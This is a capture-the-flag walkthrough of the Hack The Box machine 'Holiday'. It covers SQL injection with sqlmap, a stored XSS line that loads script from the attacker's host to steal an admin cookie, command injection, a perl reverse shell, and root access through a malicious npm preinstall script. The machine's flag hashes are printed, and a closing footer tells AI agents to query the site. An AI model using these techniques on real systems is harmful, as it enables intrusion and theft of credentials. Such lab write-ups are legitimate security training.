# Holiday

## Holiday - 10.10.10.25

### Target Enumeration:

OS: Linux

IP: 10.10.10.25

User: 5edc176c52673a6e0f087c68c531c743

Root: a844cb50bf88ebbe8412e095a6b642e8

### Ports / Services / Software Versions Running

22/tcp   open ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)

8000/tcp open  http Node.js Express framework

### Vulnerability Exploited:

SQLi to get users login details

Stored cross site scripting to steal admin cookie

Command injection to gain a perl shell

### Privilege Escalation:

User in sudoers group for npm enables preinstall function to execute commands as the root user.

<https://github.com/joaojeronimo/rimrafall>

### Exploiting the host:

Nmap

![](https://lh3.googleusercontent.com/qPp1Osgi463hoRJzNJiCeS3fNoz4rb6-imyavmiwCRchu5_iUbyKBvo7UZ8mU-czH-QD9iKpdDQ6CUHSaqx6LpSc83k1sj4v2IYK98GwfhYopx1tJKv5r0d-N8GKgZcC00fcQGNK)

Gobuster on port 8000 did not bring anything up first time:

![](https://lh6.googleusercontent.com/gmWuzckIe6FXHiZdkXwx2giAWcQ2f4A4pNMF3OZP8nT7wR_NvbM6iGoikpL0uFvtOhUHDC3GoXWC7cNawkgf83Fm8YvT_uxARuOndm0H8BRvLkDiBh0N5XfuqjYRsjCIoLXS_L_2)

So modify the user agent to look like a browser:

![](https://lh4.googleusercontent.com/qfeFM66RLPF17LSCwmJyZnHa0_5N9OQPXFvN84Au26oli9A5AoltD1hoD_9MIqILae8rX7lADT0zrQ4NQz606lyNPgYckI04qwXqq4_1pT5iOv-7JsHl4jJtr187wFhGYXA4xWu3)

Login page at /login

![](https://lh4.googleusercontent.com/HQkCblYSyVnPBBXO5lHTtgG5_29BKtppiDU0DUGD7ebiZJrD82UgADrB8lpFh8rSQH68QszPAo7FH_r-jM9-84ERgPdbrZzYbcDkTe2EvhY_0xfDFgTF-zXPLta80-5_QNkEGu__)

Test for everything including sqli, capture the login request:

![](https://lh4.googleusercontent.com/xF11goiLPoJyYXOskk15kqIGarITn4ur--68M28eHhEOIaaqekAHlYnoSVT6YikowHyJNpYbkcqr79tszU2oNmfE3FH5xCi_6YKuGdD8Gh_fmL-tWTbJTvujkxcNQKZQ6GvWgBEh)

Save as login.req and run sqlmap -r login.req --level=5 --risk=3

Vulnerable to sqli<br>

![](https://lh6.googleusercontent.com/mNNAYXLaajMiGwvEDG4EE5eTSnnXGRfxxfcoDQgy_1_65FwWbIrPieLoWnRBYR4FjNRLTJW8ewN2cXoeH7qSXO9ozXlaUtKQ-k_fRfo1IGZITR3KqheXUhZjlnLLLJI_0hsx0GSw)

Dump the whole database:

```
sqlmap -r login.req --level=5 --risk=3 --dump
```

There is a username and what looks like an md5 hash in the database:

![](https://lh5.googleusercontent.com/S7ty8uz8vKYx8z0_rZ_l-e32tjcXjyuxQFx9z_I01AOCzopym8owEO59RocWZZNKwLbn3Y_AcBROCFdUENnJE8knwYcx2XGaUyBYHpXZc3fegq-fntNaImN1F2jaqS2y4GZK4ygY)

Google the hash and it looks like we have been rickrolled

![](https://lh4.googleusercontent.com/RiAnYGx4eKYiqFjstRk02CogA613cZz4Wx-E_28sggVLzcUYAXRVWkYpInIlReGhx7vi8uPTJlzoAC282xSth49fS2C2U37Uqzuqtv_wjdNiz9eCI9KPq6zT7FVBTbslsLu4Jf5B)

Once logged in it appears to be a booking form.

![](https://lh3.googleusercontent.com/Vd0E8BpG5Okb3Oey_TRaV5BPWqrjHSEx4QA8m2QzKVGpIAwLTl6xRsynfr5BxcFhh9e9XDVyW_smfCZQyiJ3taREEusQ6lwRLUnAlxdfMNMuMoOWZJmNob9b7CFmpBg3JFzpsWtz)

Check the notes page which are being checked every minute by an administrator so it could be an xss exploit.

<div align="left"><img src="https://lh4.googleusercontent.com/SfPl4TATijpGtRqVal4g20rrWHU-wFRviaCuAhd-o8pXXAwDjNf-xGZCpSGfYNoGMgj3FTcQBCSaj3f2qdoZEBF3_2yKoLNB4EbJWHQrrLDQzvilByWpNAAQOZNcvJPOje4SYwET" alt=""></div>

Initially found very little on the application so we need to scan it intensively for flaws which also brought back nothing.

Try more advanced XSS with encoding:

Create the following inject.js file:

![](https://lh3.googleusercontent.com/8vSev32sXVSFTKOZTUtgvjMYFk-UVDayxmOLQdTjt-NoLOLOwo9aMDYZUEAQy61vLRZvyXFDvzJV8x7ktTJEjcw8LRGwbjbkZ9O_A6MZsR2b24bfR88hl0sYYJlD_l2O2lppivoU)

Encode the following string to inject into the page using <http://jdstiles.com/java/cct.html>

```
document.write('<script src="http://10.10.14.8/inject.js"></script>');
```

![](https://lh5.googleusercontent.com/fGtYy90_pxuMGITCGMEs2ig6kd832mLUpj59L05F-IK43GySsRbKvPRljGj4KHdaWQf2jZRsFAhSZbk9_9dVwilm9GylBdnx_TAJy3XEX-nGHvFQyJfiHdVtnkkvQc-I71S9wP-t)

Create the following injection string in notepad (for debugging) and then add this to the page:

![](https://lh5.googleusercontent.com/xXUByc7slIKT0J-CRMKxO5B-IJrGrG2D02bmhyCC0Zy1ovNwRg1zg2nn0Z8wwpb4wuE6xa7tNzxLqdvGXFQdVao5dG9NJdIMBzfZGUVf2ji6PD6PdKIePf-hERQ7T95PeboCyNIt)

Like so:

![](https://lh3.googleusercontent.com/jGP51nR8dvdF9GgEC-oP-ULOao_L47zl0YkvTo8NLs2_tIxdtl1IufvVpXJK9he69BzWR9MsLSS-lDS358JXKEE2ijJziYxn1WFwecJaYB7YnGSsdEtVhv8MaYxJTO_2-V5awwU_)

Set up a nc listener and after 1 minute you should see the following:

![](https://lh3.googleusercontent.com/k7y51ABphneWG16NLhHiCrJvWRs6xwyXMAcR9JCdMRMGrXsWvEoU6_cH32lvob6tYVPvkxvzT-BGxCEyj5NOhLMuM5T825kewB6gW9Y7_6nxuFS3cKqk1fbiEl3iLrudb_dBkjMm)

Now create the following cookie stealing script called inject.js and host it with python webserver.

![](https://lh4.googleusercontent.com/Ft0RXlmHMAHI_LPW1d1WXMlpxHVfg7GhB2oSGuR5Wq0A-s-qTg7kR2bRJz-dd4Qaoe_aG9ScWfID9Kh6ZHwK6d8z_YNInWJ34hSsyOrQCV7Dp-jKTSnOuzjORYIJvPnmmeOu7Qlb)

Change your nc listener to port 8000

Open a python server listener on port 80 to host your javascript.

Add a new note with the injection string

Wait around 1 minute

Response from nc listener:

![](https://lh6.googleusercontent.com/9ZKkZ4DEklC03SzEP7o5sOatnRTMladpllrRv-2k8hLfTNozrkYUmgXWA0j76ihiZoQ7tq7u5IKqyL69ivBAhTF9Qcb3lhPfe-ICAWOMRDXxG_PnBdtiUSpvaE1OZdEFJie0D5Jt)

Copy the cookie=$data to burp and decode as url and now you have the admin cookie:

![](https://lh6.googleusercontent.com/3ARutrPNbZGPD5tf3OszQ-CP0L_SH-ohKw4UWxd-6092sJXeKnaKsIV_ZEW569_95Srdc7LvvfARYtQTM2cMBb9hkrABO75-mL5N4dcZsLttR2aneUY_Wn78phGFEqTV4a9XsOyI)

Request the /admin page and capture it in burp and send to the repeater:

![](https://lh5.googleusercontent.com/N-9yxZjZAVLM7JwlOfH2YQ_Kaub5luHyjydFlBrgYe-4cbKtwZQve5kPyiFNX_tOqEUCk1Lk37I7i3TLiuJ_HRSlejLaVimJgyW_Q75sgW3CKS1X0jRBtM5qqCxAcs8pTYBOpDX1)

Now show the response in the browser:

![](https://lh5.googleusercontent.com/yCvlqOK07KwO7BIo9ITtC_n6uYe8_twUBzG16McJT4KDLW3lx_rBJWq84MA3srw89FUpt-RsDI4E0t3Jrau5PtWKuOYk6-VxXFnLm36vsEOuAWsogZ69pJTbSOhEgjn8cl9x6VFT)

The export tables function allows command execution, ensure you set the admin cookie on the requests:

![](https://lh6.googleusercontent.com/7MoJqOYPZPcUrt5slKHcmadpTbmVJ_vMPk-Z2JqDX9HKxV7ef8MEFYPI1Thc3niqlJsnglRnfOVmI7TZ-d67FIo7ipCRK9cQPwEVKuQCf6Cc48D6g_9Ka-1mT-WMqtRDylRQ0D7C)

The application filters out certian characters so use wget and your IP in binary format

![](https://lh4.googleusercontent.com/aIUSixgPPRNCRFeXApZuq-a5ck2ABaIjTxk4fKb6Kl82Tt8IyM5wWE4tF4KXpXdrx9DZjhgz2zcCwRNLCME5DfW6xGpmxNTgV2o1BGXec5qcX6tkjhYa_iLRjz7HY31aaCxQV7lh)

This worked.

![](https://lh6.googleusercontent.com/h7uShWBGChUx2l2b3mM8gnVz_eFlIu2kgSaI4bIMjY_WLDg-NgaimBC9FGJqamqtD53CGWg0N99c-VVcImZG64yiESrTmGSBnJ7stB1eTsXYfAq00Z1wR7tPI9hAbd65-_IvlHUc)

Lots of tools are missing on this box and we are restricted in what we can use however there is perl on the machine.

![](https://lh3.googleusercontent.com/Jvm6_0l3uiPK5fwl8MzkzIQWPrOLuv1fvZaQVgQZihCqC7TCNUmvTMhzPaqjwo_BCCFAGpZsBG02ipX-p-yB9M0ADmuCycU30dOCr346_rJcFRibNk0-yVnTp_lA1v5DCe4T5eJq)

Create a perl reverse shell as follows:

![](https://lh3.googleusercontent.com/q3CLTxofw3KAHQAvwH4O-V8SF3u-Umtc1-2j-Je-IYQZwkqqRzB6IRthNBG85iGVhlYWfIwuukwL0gQnlPCOxt4ooweLUdFVp2UmkM1pnRUBEtOXYz6mGbu8j6cdXBtcz4kIjszO)

Download it to the target system with nc running on port 443

![](https://lh4.googleusercontent.com/mVb5IwGyJBeTR9_p0NPoxl7pf7I8KzqG_T8i5payiiUTPBAdotDufWLSL9g3LVrdut8zN2-I75IR3gxvHIrLP8GC8WUC_GYMhoKxWQT1I-HJPaJctA87mlvPkRDwz2p-0izIBN5J)

Execute the perl2 payload

![](https://lh5.googleusercontent.com/5OMcxzlBDH5ogZaP3dxs100OPGe2UAMdWIVrIY1uOX2YrMEn06m9mDTt0OY0idj7Z2DAYAFQZYexSTzd0CjOW6VZqFzwSyphIWT_2jdezdk0sJNta2Y4tJIPQMs2_tdFhlQzZLej)

Now you have a shell:

![](https://lh3.googleusercontent.com/pp1ub9riht3iWyUqB1CVIE_1TMg-y286zP569ySKxH8956HlTe27PPPWVT9YVTmUW-n4Vct47vEyupaETrSM3QVihF-Do6IIIRLEAZRvL7pjqP1hh_vCL8B5x-LTbdSbhrENB-2o)

Grab the user.txt file

![](https://lh5.googleusercontent.com/VW1QzT9qs_2G17PMbBr8b1M4HI5ijBSxDHNgr7fg0UPxA8L2apdIr3Ctu4PA2EZAgGvoaSfWkudAYomH0caThREWF2LNivgmdlI7WbQy7QpQSDXWaqx0NAkhzjUitNmC-K0TmEBx)

Sudo -l says we can run the following commands as our current user.

![](https://lh5.googleusercontent.com/o6lSxyVO8bBwupHLC7TKfMhZ6FZWa7F6L6zFQn_Ec6ux2W_1qCA7dleqiXSF7gSTpZsOOabJS9txJRdyvQTaqfRqgpEuGk-CgsgZIHINsu2YU1w7UgqguDvzg_jxeBkhaNYeivGa)

Exploit link:

<https://github.com/joaojeronimo/rimrafall>

Create the following files locally:

![](https://lh6.googleusercontent.com/21pfbl-bibf4y_fiZ4C06m4IuFgf3ZjZAJohY28bDqzItuP7-t8W--zzGvY5s_GuazUjesUFImBANddx2nG8cvTgKMyjzqopQyHhEKB2BN4saZK2To-bXtXj3sCSUiMZzMyE_K7b)

Set up a nc listener on port 444 locally and download the created files to a directory called rimrafall/ in the app dir

Then execute the following command to get root:

```
cd ../
sudo npm i rimrafall --unsafe
```

Now you have a root shell so collect the flag.

![](https://lh5.googleusercontent.com/FSQ7jQrXksdVTAMNbB4tqxmRlYYNw_QiMQBj4RRzu2oipp2FCV54buhXZBWpW4_PAzZk3xou4HSp7lvZ_iEYNfa_V5e7L2nzBaiNFEvVmXDRyTRAlvBcCJ91hiZxYFDiGcASrWTP)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.jdksec.com/hack-the-box/holiday.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.